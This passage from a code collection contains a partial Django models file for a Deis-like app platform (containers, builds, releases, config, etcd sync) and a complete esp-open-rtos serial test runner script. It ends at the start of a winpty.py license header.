                                     release=self.release_set.latest(),
                                     type='run',
                                     num=c_num)
        image = c.release.image

        # check for backwards compatibility
        def _has_hostname(image):
            # a registry hostname looks like "host.domain/repo"
            repo, tag = utils.parse_repository_tag(image)
            return True if '/' in repo and '.' in repo.split('/')[0] else False

        if not _has_hostname(image):
            image = '{}:{}/{}'.format(settings.REGISTRY_HOST,
                                      settings.REGISTRY_PORT,
                                      image)
        # SECURITY: shell-escape user input
        escaped_command = command.replace("'", "'\\''")
        return c.run(escaped_command)
@python_2_unicode_compatible
class Container(UuidAuditedModel):
    """
    Docker container used to securely host an application process.

    Lifecycle changes are modeled as django-fsm transitions; each transition
    calls out to the scheduler backend and logs failures against the app.
    """

    # lifecycle states, roughly in order of progression
    INITIALIZED = 'initialized'
    CREATED = 'created'
    UP = 'up'
    DOWN = 'down'
    DESTROYED = 'destroyed'
    CRASHED = 'crashed'
    ERROR = 'error'
    STATE_CHOICES = (
        (INITIALIZED, 'initialized'),
        (CREATED, 'created'),
        (UP, 'up'),
        (DOWN, 'down'),
        (DESTROYED, 'destroyed'),
        (CRASHED, 'crashed'),
        (ERROR, 'error'),
    )

    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    app = models.ForeignKey('App')
    release = models.ForeignKey('Release')
    # process type, e.g. 'web', 'worker', or 'run' for one-off commands
    type = models.CharField(max_length=128, blank=False)
    # 1-based index within the process type
    num = models.PositiveIntegerField()
    # protected FSM field: only @transition methods may change it
    state = FSMField(default=INITIALIZED, choices=STATE_CHOICES,
                     protected=True, propagate=False)

    def short_name(self):
        return "{}.{}.{}".format(self.app.id, self.type, self.num)
    short_name.short_description = 'Name'

    def __str__(self):
        return self.short_name()

    class Meta:
        get_latest_by = '-created'
        ordering = ['created']

    def _get_job_id(self):
        """Build the scheduler job id, e.g. 'myapp_v2.web.1'."""
        app = self.app.id
        release = self.release
        version = "v{}".format(release.version)
        num = self.num
        # note: '{self.type}' resolves because 'self' is in locals()
        job_id = "{app}_{version}.{self.type}.{num}".format(**locals())
        return job_id

    _job_id = property(_get_job_id)

    def _get_scheduler(self):
        return self.app._scheduler

    _scheduler = property(_get_scheduler)

    def _get_command(self):
        """Derive the container command from the release's build."""
        try:
            # if this is not procfile-based app, ensure they cannot break out
            # and run arbitrary commands on the host
            # FIXME: remove slugrunner's hardcoded entrypoint
            if self.release.build.dockerfile or not self.release.build.sha:
                return "bash -c '{}'".format(self.release.build.procfile[self.type])
            else:
                return 'start {}'.format(self.type)
        # if the key is not present or if a parent attribute is None
        except (KeyError, TypeError, AttributeError):
            # handle special case for Dockerfile deployments
            return '' if self.type == 'cmd' else 'start {}'.format(self.type)

    _command = property(_get_command)

    def clone(self, release):
        """Copy this container's identity onto a new release (same type/num)."""
        c = Container.objects.create(owner=self.owner,
                                     app=self.app,
                                     release=release,
                                     type=self.type,
                                     num=self.num)
        return c

    @transition(field=state, source=INITIALIZED, target=CREATED, on_error=ERROR)
    def create(self):
        """Create the container with the scheduler (does not start it)."""
        image = self.release.image
        kwargs = {'memory': self.release.config.memory,
                  'cpu': self.release.config.cpu,
                  'tags': self.release.config.tags}
        job_id = self._job_id
        try:
            self._scheduler.create(
                name=job_id,
                image=image,
                command=self._command,
                **kwargs)
        except Exception as e:
            err = '{} (create): {}'.format(job_id, e)
            log_event(self.app, err, logging.ERROR)
            raise

    @transition(field=state, source=[CREATED, UP, DOWN], target=UP, on_error=CRASHED)
    def start(self):
        """Start (or restart) the scheduled container."""
        job_id = self._job_id
        try:
            self._scheduler.start(job_id)
        except Exception as e:
            err = '{} (start): {}'.format(job_id, e)
            log_event(self.app, err, logging.WARNING)
            raise

    @transition(field=state, source=UP, target=DOWN, on_error=ERROR)
    def stop(self):
        """Stop the running container without destroying it."""
        job_id = self._job_id
        try:
            self._scheduler.stop(job_id)
        except Exception as e:
            err = '{} (stop): {}'.format(job_id, e)
            log_event(self.app, err, logging.ERROR)
            raise

    @transition(field=state, source='*', target=DESTROYED, on_error=ERROR)
    def destroy(self):
        """Destroy the container with the scheduler, from any state."""
        job_id = self._job_id
        try:
            self._scheduler.destroy(job_id)
        except Exception as e:
            err = '{} (destroy): {}'.format(job_id, e)
            log_event(self.app, err, logging.ERROR)
            raise

    def run(self, command):
        """Run a one-off command"""
        if self.release.build is None:
            raise EnvironmentError('No build associated with this release '
                                   'to run this command')
        image = self.release.image
        job_id = self._job_id
        entrypoint = '/bin/bash'
        # if this is a procfile-based app, switch the entrypoint to slugrunner's default
        # FIXME: remove slugrunner's hardcoded entrypoint
        if self.release.build.procfile and \
           self.release.build.sha and not \
           self.release.build.dockerfile:
            entrypoint = '/runner/init'
            command = "'{}'".format(command)
        else:
            command = "-c '{}'".format(command)
        try:
            rc, output = self._scheduler.run(job_id, image, entrypoint, command)
            return rc, output
        except Exception as e:
            err = '{} (run): {}'.format(job_id, e)
            log_event(self.app, err, logging.ERROR)
            raise
@python_2_unicode_compatible
class Push(UuidAuditedModel):
    """
    Instance of a push used to trigger an application build
    """
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    app = models.ForeignKey('App')
    # git commit sha of the push
    sha = models.CharField(max_length=40)
    # fingerprint of the SSH key that performed the push
    fingerprint = models.CharField(max_length=255)
    # metadata captured from the git-receive hook / SSH session
    receive_user = models.CharField(max_length=255)
    receive_repo = models.CharField(max_length=255)
    ssh_connection = models.CharField(max_length=255)
    ssh_original_command = models.CharField(max_length=255)

    class Meta:
        get_latest_by = 'created'
        ordering = ['-created']
        unique_together = (('app', 'uuid'),)

    def __str__(self):
        # e.g. "myapp-a1b2c3d" (short sha)
        return "{0}-{1}".format(self.app.id, self.sha[:7])
@python_2_unicode_compatible
class Build(UuidAuditedModel):
    """
    Instance of a software build used by runtime nodes
    """
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    app = models.ForeignKey('App')
    # docker image produced by (or promoted into) this build
    image = models.CharField(max_length=256)

    # optional fields populated by builder
    sha = models.CharField(max_length=40, blank=True)
    procfile = JSONField(default={}, blank=True)
    dockerfile = models.TextField(blank=True)

    class Meta:
        get_latest_by = 'created'
        ordering = ['-created']
        unique_together = (('app', 'uuid'),)

    def create(self, user, *args, **kwargs):
        """Create a new release from this build and deploy it.

        Deletes the new release row if the deploy raises RuntimeError,
        then re-raises.
        """
        latest_release = self.app.release_set.latest()
        source_version = 'latest'
        if self.sha:
            source_version = 'git-{}'.format(self.sha)
        new_release = latest_release.new(user,
                                         build=self,
                                         config=latest_release.config,
                                         source_version=source_version)
        # an empty structure means this is the app's first deploy,
        # which triggers default scaling
        initial = True if self.app.structure == {} else False
        try:
            self.app.deploy(user, new_release, initial=initial)
            return new_release
        except RuntimeError:
            new_release.delete()
            raise

    def __str__(self):
        return "{0}-{1}".format(self.app.id, self.uuid[:7])
@python_2_unicode_compatible
class Config(UuidAuditedModel):
    """
    Set of configuration values applied as environment variables
    during runtime execution of the Application.
    """
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    app = models.ForeignKey('App')
    # environment variables (KEY -> value)
    values = JSONField(default={}, blank=True)
    # per-process-type resource limits
    memory = JSONField(default={}, blank=True)
    cpu = JSONField(default={}, blank=True)
    # scheduler placement tags
    tags = JSONField(default={}, blank=True)

    class Meta:
        get_latest_by = 'created'
        ordering = ['-created']
        unique_together = (('app', 'uuid'),)

    def __str__(self):
        return "{}-{}".format(self.app.id, self.uuid[:7])
@python_2_unicode_compatible
class Release(UuidAuditedModel):
    """
    Software release deployed by the application platform

    Releases contain a :class:`Build` and a :class:`Config`.
    """
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    app = models.ForeignKey('App')
    # monotonically increasing per-app version number
    version = models.PositiveIntegerField()
    # human-readable change summary, composed in save() when empty
    summary = models.TextField(blank=True, null=True)
    config = models.ForeignKey('Config')
    # null for the initial (build-less) release created with the app
    build = models.ForeignKey('Build', null=True)

    class Meta:
        get_latest_by = 'created'
        ordering = ['-created']
        unique_together = (('app', 'version'),)

    def __str__(self):
        return "{0}-v{1}".format(self.app.id, self.version)

    @property
    def image(self):
        # registry tag this release is published under
        return '{}:v{}'.format(self.app.id, str(self.version))

    def new(self, user, config, build, summary=None, source_version='latest'):
        """
        Create a new application release using the provided Build and Config
        on behalf of a user.

        Releases start at v1 and auto-increment.
        """
        # construct fully-qualified target image
        new_version = self.version + 1
        # create new release and auto-increment version
        release = Release.objects.create(
            owner=user, app=self.app, config=config,
            build=build, version=new_version, summary=summary)
        try:
            # NOTE(review): source_version is accepted here but not forwarded
            # to publish() — confirm whether that is intentional
            release.publish()
        except EnvironmentError as e:
            # If we cannot publish this app, just log and carry on
            logger.info(e)
            pass
        return release

    def publish(self, source_version='latest'):
        """Tag and publish this release's image in the platform registry.

        :raises EnvironmentError: when the release has no build
        """
        if self.build is None:
            raise EnvironmentError('No build associated with this release to publish')
        source_tag = 'git-{}'.format(self.build.sha) if self.build.sha else source_version
        source_image = '{}:{}'.format(self.build.image, source_tag)
        # IOW, this image did not come from the builder
        # FIXME: remove check for mock registry module
        if not self.build.sha and 'mock' not in settings.REGISTRY_MODULE:
            # we assume that the image is not present on our registry,
            # so shell out a task to pull in the repository
            data = {
                'src': self.build.image
            }
            requests.post(
                '{}/v1/repositories/{}/tags'.format(settings.REGISTRY_URL,
                                                    self.app.id),
                data=data,
            )
            # update the source image to the repository we just imported
            source_image = self.app.id
            # if the image imported had a tag specified, use that tag as the source
            if ':' in self.build.image:
                # guard against a ':' that belongs to a host:port, not a tag
                if '/' not in self.build.image[self.build.image.rfind(':') + 1:]:
                    source_image += self.build.image[self.build.image.rfind(':'):]
        publish_release(source_image,
                        self.config.values,
                        self.image)

    def previous(self):
        """
        Return the previous Release to this one.

        :return: the previous :class:`Release`, or None
        """
        releases = self.app.release_set
        if self.pk:
            releases = releases.exclude(pk=self.pk)
        try:
            # Get the Release previous to this one
            prev_release = releases.latest()
        except Release.DoesNotExist:
            prev_release = None
        return prev_release

    def rollback(self, user, version):
        """Create and deploy a new release that reuses an older version's
        build and config."""
        if version < 1:
            # NOTE(review): message says "below 0" but the check rejects
            # anything below 1 — confirm intended wording
            raise EnvironmentError('version cannot be below 0')
        summary = "{} rolled back to v{}".format(user, version)
        prev = self.app.release_set.get(version=version)
        new_release = self.new(
            user,
            build=prev.build,
            config=prev.config,
            summary=summary,
            source_version='v{}'.format(version))
        try:
            self.app.deploy(user, new_release)
            return new_release
        except RuntimeError:
            # undo the release row if the deploy failed
            new_release.delete()
            raise

    def save(self, *args, **kwargs):  # noqa
        """Compose a human-readable summary of what changed (build, config
        values, limits, tags) relative to the previous release, then persist.
        A caller-provided summary is left untouched."""
        if not self.summary:
            self.summary = ''
            prev_release = self.previous()
            # compare this build to the previous build
            old_build = prev_release.build if prev_release else None
            old_config = prev_release.config if prev_release else None
            # if the build changed, log it and who pushed it
            if self.version == 1:
                self.summary += "{} created initial release".format(self.app.owner)
            elif self.build != old_build:
                if self.build.sha:
                    self.summary += "{} deployed {}".format(self.build.owner, self.build.sha[:7])
                else:
                    self.summary += "{} deployed {}".format(self.build.owner, self.build.image)
            # if the config data changed, log the dict diff
            if self.config != old_config:
                dict1 = self.config.values
                dict2 = old_config.values if old_config else {}
                diff = dict_diff(dict1, dict2)
                # try to be as succinct as possible
                added = ', '.join(k for k in diff.get('added', {}))
                added = 'added ' + added if added else ''
                changed = ', '.join(k for k in diff.get('changed', {}))
                changed = 'changed ' + changed if changed else ''
                deleted = ', '.join(k for k in diff.get('deleted', {}))
                deleted = 'deleted ' + deleted if deleted else ''
                changes = ', '.join(i for i in (added, changed, deleted) if i)
                if changes:
                    if self.summary:
                        self.summary += ' and '
                    self.summary += "{} {}".format(self.config.owner, changes)
                # if the limits changed (memory or cpu), log the dict diff
                changes = []
                old_mem = old_config.memory if old_config else {}
                diff = dict_diff(self.config.memory, old_mem)
                if diff.get('added') or diff.get('changed') or diff.get('deleted'):
                    changes.append('memory')
                old_cpu = old_config.cpu if old_config else {}
                diff = dict_diff(self.config.cpu, old_cpu)
                if diff.get('added') or diff.get('changed') or diff.get('deleted'):
                    changes.append('cpu')
                if changes:
                    changes = 'changed limits for '+', '.join(changes)
                    self.summary += "{} {}".format(self.config.owner, changes)
                # if the tags changed, log the dict diff
                changes = []
                old_tags = old_config.tags if old_config else {}
                diff = dict_diff(self.config.tags, old_tags)
                # try to be as succinct as possible
                added = ', '.join(k for k in diff.get('added', {}))
                added = 'added tag ' + added if added else ''
                changed = ', '.join(k for k in diff.get('changed', {}))
                changed = 'changed tag ' + changed if changed else ''
                deleted = ', '.join(k for k in diff.get('deleted', {}))
                deleted = 'deleted tag ' + deleted if deleted else ''
                changes = ', '.join(i for i in (added, changed, deleted) if i)
                if changes:
                    if self.summary:
                        self.summary += ' and '
                    self.summary += "{} {}".format(self.config.owner, changes)
            # fall back to a generic summary when nothing above applied
            if not self.summary:
                if self.version == 1:
                    self.summary = "{} created the initial release".format(self.owner)
                else:
                    self.summary = "{} changed nothing".format(self.owner)
        super(Release, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Domain(AuditedModel):
    """Custom domain name attached to an :class:`App`."""
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    app = models.ForeignKey('App')
    # fully-qualified domain name; globally unique across the platform
    domain = models.TextField(blank=False, null=False, unique=True)

    def __str__(self):
        return self.domain
@python_2_unicode_compatible
class Key(UuidAuditedModel):
    """An SSH public key."""
    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    # user-chosen key name, unique per owner
    id = models.CharField(max_length=128)
    # full public key material; globally unique
    public = models.TextField(unique=True)

    class Meta:
        verbose_name = 'SSH Key'
        unique_together = (('owner', 'id'))

    def __str__(self):
        # show a truncated head...tail of the key material
        return "{}...{}".format(self.public[:18], self.public[-31:])
# define update/delete callbacks for synchronizing
# models with the configuration management backend
def _log_build_created(**kwargs):
    """post_save hook: log when a new Build row is inserted."""
    if not kwargs.get('created'):
        return
    build = kwargs['instance']
    log_event(build.app, "build {} created".format(build))
def _log_release_created(**kwargs):
    """post_save hook: log when a new Release row is inserted."""
    if not kwargs.get('created'):
        return
    release = kwargs['instance']
    log_event(release.app, "release {} created".format(release))
    # append release lifecycle logs to the app
    release.app.log(release.summary)
def _log_config_updated(**kwargs):
    """post_save hook: log every Config save (creation or update)."""
    cfg = kwargs['instance']
    log_event(cfg.app, "config {} updated".format(cfg))
def _log_domain_added(**kwargs):
    """post_save hook: record a newly attached domain in the app log."""
    dom = kwargs['instance']
    note = "domain {} added".format(dom)
    log_event(dom.app, note)
    # no release is created for domain changes, so write the app log directly
    dom.app.log(note)
def _log_domain_removed(**kwargs):
    """post_delete hook: record a detached domain in the app log."""
    dom = kwargs['instance']
    note = "domain {} removed".format(dom)
    log_event(dom.app, note)
    # no release is created for domain changes, so write the app log directly
    dom.app.log(note)
def _etcd_publish_key(**kwargs):
    """Write a user's SSH public key to etcd for the builder component."""
    key = kwargs['instance']
    path = '/deis/builder/users/{}/{}'.format(key.owner.username,
                                              fingerprint(key.public))
    _etcd_client.write(path, key.public)
def _etcd_purge_key(**kwargs):
    """Remove a deleted SSH public key from etcd."""
    key = kwargs['instance']
    path = '/deis/builder/users/{}/{}'.format(key.owner.username,
                                              fingerprint(key.public))
    _etcd_client.delete(path)
def _etcd_purge_user(**kwargs):
    """Remove a deleted user's entire key directory from etcd, if present."""
    username = kwargs['instance'].username
    path = '/deis/builder/users/{}'.format(username)
    try:
        _etcd_client.delete(path, dir=True, recursive=True)
    except KeyError:
        # If _etcd_publish_key() wasn't called, there is no user dir to delete.
        pass
def _etcd_create_app(**kwargs):
    """Register a freshly created app's service directory in etcd."""
    app = kwargs['instance']
    if not kwargs['created']:
        return
    _etcd_client.write('/deis/services/{}'.format(app), None, dir=True)
def _etcd_purge_app(**kwargs):
    """Drop a deleted app's service directory from etcd."""
    app = kwargs['instance']
    path = '/deis/services/{}'.format(app)
    _etcd_client.delete(path, dir=True, recursive=True)
def _etcd_publish_domains(**kwargs):
    """Publish an app's domains to etcd as a space-separated list."""
    app = kwargs['instance'].app
    domains = app.domain_set.all()
    if domains:
        value = ' '.join(str(d.domain) for d in domains)
        _etcd_client.write('/deis/domains/{}'.format(app), value)
def _etcd_purge_domains(**kwargs):
    """Refresh an app's domain list in etcd, deleting the key when empty."""
    app = kwargs['instance'].app
    remaining = app.domain_set.all()
    if not remaining:
        _etcd_client.delete('/deis/domains/{}'.format(app))
    else:
        value = ' '.join(str(d.domain) for d in remaining)
        _etcd_client.write('/deis/domains/{}'.format(app), value)
# Log significant app-related events
# (dispatch_uid prevents duplicate registration on repeated imports)
post_save.connect(_log_build_created, sender=Build, dispatch_uid='api.models.log')
post_save.connect(_log_release_created, sender=Release, dispatch_uid='api.models.log')
post_save.connect(_log_config_updated, sender=Config, dispatch_uid='api.models.log')
post_save.connect(_log_domain_added, sender=Domain, dispatch_uid='api.models.log')
post_delete.connect(_log_domain_removed, sender=Domain, dispatch_uid='api.models.log')
# automatically generate a new token on creation
@receiver(post_save, sender=get_user_model())
def create_auth_token(sender, instance=None, created=False, **kwargs):
    """Create a DRF auth token whenever a new user account is saved."""
    if not created:
        return
    Token.objects.create(user=instance)
# save FSM transitions as they happen
def _save_transition(**kwargs):
    """Persist the model after every django-fsm state transition."""
    kwargs['instance'].save()
    # close database connections after transition
    # to avoid leaking connections inside threads
    from django.db import connection
    connection.close()

post_transition.connect(_save_transition)
# wire up etcd publishing if we can connect
try:
    _etcd_client = etcd.Client(host=settings.ETCD_HOST, port=int(settings.ETCD_PORT))
    # probe the cluster; raises EtcdException when unreachable
    _etcd_client.get('/deis')
except etcd.EtcdException:
    logger.log(logging.WARNING, 'Cannot synchronize with etcd cluster')
    _etcd_client = None

# only register etcd synchronization hooks when the probe succeeded
if _etcd_client:
    post_save.connect(_etcd_publish_key, sender=Key, dispatch_uid='api.models')
    post_delete.connect(_etcd_purge_key, sender=Key, dispatch_uid='api.models')
    post_delete.connect(_etcd_purge_user, sender=get_user_model(), dispatch_uid='api.models')
    post_save.connect(_etcd_publish_domains, sender=Domain, dispatch_uid='api.models')
    post_delete.connect(_etcd_purge_domains, sender=Domain, dispatch_uid='api.models')
    post_save.connect(_etcd_create_app, sender=App, dispatch_uid='api.models')
    post_delete.connect(_etcd_purge_app, sender=App, dispatch_uid='api.models')
|
test_runner.py | #!/usr/bin/env python3
import sys
import argparse
import subprocess
import os
import serial
import threading
import re
import time
SHORT_OUTPUT_TIMEOUT = 0.25 # timeout for resetting and/or waiting for more lines of output
TESTCASE_TIMEOUT = 60
TESTRUNNER_BANNER = "esp-open-rtos test runner."
RESET_RETRIES = 10 # retries to receive test runner banner after reset
def run(env_a, env_b, cases):
    """Execute *cases* against the environment(s), print a status summary,
    and return True when no case failed."""
    counts = {status: 0 for status in TestResult.STATUS_NAMES}
    failures = False
    for test in cases:
        if test.case_type == 'dual' and env_b is None:
            res = TestResult(TestResult.SKIPPED, 'Dual test case skipped')
        elif test.case_type == 'dual':
            res = test.run(env_a, env_b)
        else:
            res = test.run(env_a)
        counts[res.status] += 1
        failures = failures or res.is_failure()
    print("%20s: %d" % ("Total tests", sum(c for c in counts.values())))
    print()
    # print status counts for tests
    for status in sorted(counts):
        print("%20s: %d" % (TestResult.STATUS_NAMES[status], counts[status]))
    return not failures
def main():
    """Entry point: flash both units if requested, enumerate test cases,
    and run (or list) them; exits with 0 on success, 1 on failure."""
    global verbose
    args = parse_args()
    verbose = args.verbose
    if not args.no_flash:
        flash_image(args.aport)
        if args.type != 'solo':
            # dual-unit runs need the second board flashed too
            flash_image(args.bport)
    env = TestEnvironment(args.aport, TestEnvironment.A)
    env_b = None
    cases = env.get_testlist()
    if args.type != 'solo':
        env_b = TestEnvironment(args.bport, TestEnvironment.B)
        cases_b = env_b.get_testlist()
        # both units must enumerate an identical case list
        if cases != cases_b:
            raise TestRunnerError("Test cases on units A & B don't match")
    if args.list:  # if list option is specified, do not run test cases
        print("List of test cases:")
        for test in cases:
            print(test)
        sys.exit(0)
    if args.testcases:  # if testcases is specified run only those cases
        cases = [c for c in cases if str(c.index) in args.testcases]
    sys.exit(0 if run(env, env_b, cases) else 1)
class TestCase(object):
    """A single named test case enumerated from the device's test runner."""

    def __init__(self, index, name, case_type):
        self.name = name
        self.index = index
        # 'solo' or 'dual' (dual cases require a second unit)
        self.case_type = case_type

    def __repr__(self):
        return "#%d: %s (%s)" % (self.index, self.name, self.case_type)

    def __eq__(self, other):
        # cases are equal when two units enumerate them identically
        return (self.index == other.index and
                self.name == other.name and
                self.case_type == other.case_type)

    def run(self, env_a, env_b=None):
        """
        Run the test represented by this instance, against the environment(s) passed in.

        Returns a TestResult
        """
        sys.stdout.write("Running test case '%s'...%s" % (self.name, "\n" if verbose else " "*(40-len(self.name))))
        mon_a = env_a.start_testcase(self)
        mon_b = env_b.start_testcase(self) if env_b else None
        while True:
            if mon_a.get_result() and (mon_b is None or mon_b.get_result()):
                break  # all running test environments have finished
            # or, in the case both are running, stop as soon as either environment shows a failure
            try:
                if mon_a.get_result().is_failure():
                    mon_b.cancel()
                    break
            except AttributeError:
                # get_result() is None while the monitor is still running
                pass
            try:
                # mon_b may be None (solo case), which also raises AttributeError
                if mon_b.get_result().is_failure():
                    mon_a.cancel()
                    break
            except AttributeError:
                pass
            time.sleep(0.1)
        if mon_b is not None:
            # return whichever result is more severe
            res = max(mon_a.get_result(), mon_b.get_result())
        else:
            res = mon_a.get_result()
        if not verbose:  # finish the line after the ...
            print(TestResult.STATUS_NAMES[res.status])
        if res.is_failure():
            message = res.message
            if "/" in res.message:  # cut anything before the file name in the failure
                message = message[message.index("/"):]
            print("FAILURE MESSAGE:\n%s\n" % message)
        return res
class TestResult(object):
    """ Class to wrap a test result code and a message """
    # Test status flags, higher = more severe
    CANCELLED = 0
    SKIPPED = 1
    PASSED = 2
    FAILED = 3
    ERROR = 4
    STATUS_NAMES = {
        CANCELLED: "Cancelled",
        SKIPPED: "Skipped",
        PASSED: "Passed",
        FAILED: "Failed",
        ERROR: "Error"
    }

    def __init__(self, status, message):
        self.status = status
        self.message = message

    def is_failure(self):
        """True for statuses that should fail the run (FAILED or ERROR)."""
        return self.status >= TestResult.FAILED

    def __eq__(self, other):
        # BUGFIX: this method was misspelled `__qe__`, so `==` silently fell
        # back to identity comparison. Results compare equal by status only.
        if other is None:
            return False
        else:
            return self.status == other.status

    def __lt__(self, other):
        # ordering by severity; used by max() to pick the worse of two results
        if other is None:
            return False
        else:
            return self.status < other.status
class TestMonitor(object):
    """ Class to monitor a running test case in a separate thread, defer reporting of the result until it's done.

    Can poll for completion by calling is_done(), read a TestResult via .get_result()
    """
    def __init__(self, port, instance):
        super(TestMonitor, self).__init__()
        self._thread = threading.Thread(target=self._monitorThread)
        self._port = port
        self._instance = instance  # unit label ("A"/"B") used to prefix output
        self._result = None
        self._cancelled = False
        self.output = ""
        self._thread.start()

    def cancel(self):
        """Ask the monitor thread to stop; its result becomes CANCELLED."""
        self._cancelled = True

    def is_done(self):
        return self._result is not None

    def get_result(self):
        """Return the TestResult, or None while the monitor is still running."""
        return self._result

    def _monitorThread(self):
        """Read serial output until PASS/FAIL/crash, cancellation, or timeout."""
        self.output = ""
        start_time = time.time()
        self._port.timeout = SHORT_OUTPUT_TIMEOUT
        try:
            while not self._cancelled and time.time() < start_time + TESTCASE_TIMEOUT:
                line = self._port.readline().decode("utf-8", "ignore")
                if line == "":
                    continue  # timed out
                self.output += "%s+%4.2fs %s" % (self._instance, time.time()-start_time, line)
                verbose_print(line.strip())
                if line.endswith(":PASS\r\n"):
                    self._result = TestResult(TestResult.PASSED, "Test passed.")
                    return
                elif ":FAIL:" in line:
                    self._result = TestResult(TestResult.FAILED, line)
                    return
                elif line == TESTRUNNER_BANNER:
                    # seeing the startup banner mid-test means the unit reset
                    self._result = TestResult(TestResult.ERROR, "Test caused crash and reset.")
                    return
            # BUGFIX: the condition was inverted (`if not self._cancelled`),
            # reporting CANCELLED on timeout and "timed out" on cancellation.
            # The loop only exits here via cancellation or the timeout.
            if self._cancelled:
                self._result = TestResult(TestResult.CANCELLED, "Cancelled")
            else:
                self._result = TestResult(TestResult.ERROR, "Test timed out")
        finally:
            self._port.timeout = None
class TestEnvironment(object):
    """ Wraps one attached test board: its serial port plus the instance
    label ("A"/"B") used to address it on the test runner prompt. """
    A = "A"
    B = "B"

    def __init__(self, port, instance):
        self._name = port  # keep the port path for human-readable messages
        self._port = TestSerialPort(port, baudrate=115200)
        self._instance = instance

    def reset(self):
        """ Resets the test board, and waits for the test runner program to start up """
        for i in range(RESET_RETRIES):
            # Pulse RTS (wired to the board's reset line) with DTR deasserted.
            self._port.setDTR(False)
            self._port.setRTS(True)
            time.sleep(0.05)
            self._port.flushInput()
            self._port.setRTS(False)
            verbose_print("Waiting for test runner startup...")
            if self._port.wait_line(lambda line: line == TESTRUNNER_BANNER):
                return
            else:
                verbose_print("Retrying to reset the test board, attempt=%d" %
                              (i + 1))
                continue
        # BUG FIX: interpolate the port name, not the serial object's repr
        raise TestRunnerError("Port %s failed to start test runner" % self._name)

    def get_testlist(self):
        """ Resets the test board and returns the enumerated list of all supported tests """
        self.reset()
        tests = []
        verbose_print("Enumerating tests...")

        def collect_testcases(line):
            # Collects "CASE <index> = <name> <TYPE>" lines until the prompt.
            if line.startswith(">"):
                return True  # prompt means list of test cases is done, success
            m = re.match(r"CASE (\d+) = (.+?) ([A-Z]+)", line)
            if m is not None:
                t = TestCase(int(m.group(1)), m.group(2), m.group(3).lower())
                verbose_print(t)
                tests.append(t)

        if not self._port.wait_line(collect_testcases):
            # BUG FIX: use the port name, not the serial object, in the message
            raise TestRunnerError("Port %s failed to read test list" % self._name)
        verbose_print("Port %s found %d test cases" % (self._name, len(tests)))
        return tests

    def start_testcase(self, case):
        """ Starts the specified test instance and returns a TestMonitor reader thread instance
        to monitor the output
        """
        # synchronously start the test case
        self.reset()
        if not self._port.wait_line(lambda line: line.startswith(">")):
            # BUG FIX: "runnner" -> "runner" typo in the error message
            raise TestRunnerError("Failed to read test runner prompt")
        command = "%s%d\r\n" % (self._instance, case.index)
        self._port.write(command.encode("utf-8"))
        return TestMonitor(self._port, self._instance)
def get_testdir():
    """
    Return the 'tests' directory in the source tree
    (assuming the test_runner.py script is in that directory.
    """
    # BUG FIX: this used os.path.dirname(__name__), i.e. the dirname of the
    # module *name* (e.g. "__main__"), which is always "".  The intent is the
    # directory containing this script, so use __file__.
    res = os.path.dirname(__file__)
    return "." if res == "" else res
def flash_image(serial_port):
    """Build and flash the test image to the board attached to serial_port.

    Bit hacky: rather than calling esptool directly, just use the Makefile
    flash target with the correct ESPPORT argument.
    """
    env = dict(os.environ)
    env["ESPPORT"] = serial_port
    verbose_print("Building and flashing test image to %s..." % serial_port)
    try:
        # Show the build output only in verbose mode.
        stdout = sys.stdout if verbose else None
        subprocess.check_call(["make", "flash"], cwd=get_testdir(),
                              stdout=stdout, stderr=subprocess.STDOUT, env=env)
    except subprocess.CalledProcessError as e:
        # BUG FIX: the environment variable is ESPPORT, not EPPORT
        raise TestRunnerError("'make flash ESPPORT=%s' failed with exit code %d" %
                              (serial_port, e.returncode))
    verbose_print("Flashing successful.")
def parse_args():
    """Build the test_runner argument parser and parse the command line."""
    p = argparse.ArgumentParser(description='esp-open-rtos testrunner', prog='test_runner')

    p.add_argument('--type', '-t',
                   choices=['solo', 'dual', 'eyore_test'], default='solo',
                   help='Type of test hardware attached to serial ports A & (optionally) B')
    p.add_argument('--aport', '-a', default='/dev/ttyUSB0',
                   help='Serial port for device A')
    p.add_argument('--bport', '-b', default='/dev/ttyUSB1',
                   help="Serial port for device B (ignored if type is 'solo')")

    # The three boolean flags share the same shape, so add them in one pass.
    for long_flag, short_flag, flag_help in (
            ('--no-flash', '-n', "Don't flash the test binary image before running tests"),
            ('--list', '-l', 'Display list of available test cases on a device'),
            ('--verbose', '-v', 'Verbose test runner debugging output')):
        p.add_argument(long_flag, short_flag, help=flag_help,
                       action='store_true', default=False)

    p.add_argument('testcases', nargs='*',
                   help='Optional list of test case numbers to run. '
                        'By default, all tests are run.')
    return p.parse_args()
class TestRunnerError(RuntimeError):
    """Raised for any fatal error while driving the attached test hardware."""
    def __init__(self, message):
        super(TestRunnerError, self).__init__(message)
class TestSerialPort(serial.Serial):
    # Thin serial.Serial subclass adding line-oriented "wait for output" support.
    def __init__(self, *args, **kwargs):
        super(TestSerialPort, self).__init__(*args, **kwargs)

    def wait_line(self, callback, timeout=SHORT_OUTPUT_TIMEOUT):
        """ Wait for the port to output a particular piece of line content, as judged by callback

        Callback called as 'callback(line)' and returns not-True if non-match otherwise can return any value.

        Returns first non-False result from the callback, or None if it timed out waiting for a new line.

        Note that a serial port spewing legitimate lines of output may block this function forever, if callback
        doesn't detect this is happening.
        """
        # Temporarily install a read timeout so readline() cannot block forever.
        self.timeout = timeout
        try:
            res = None
            while not res:
                line = self.readline()
                if line == b"":
                    break  # timed out
                line = line.decode("utf-8", "ignore").rstrip()
                res = callback(line)
            return res
        finally:
            # Always restore blocking reads for the next user of the port.
            self.timeout = None
# Global verbosity flag; flipped on by the --verbose command line option.
verbose = False


def verbose_print(msg):
    """Print msg to stdout, but only when verbose output is enabled."""
    if not verbose:
        return
    print(msg)
if __name__ == '__main__':
    try:
        main()
    except TestRunnerError as e:
        # Report the failure reason and exit non-zero so callers/CI notice.
        print(e)
        sys.exit(2)
|
winpty.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
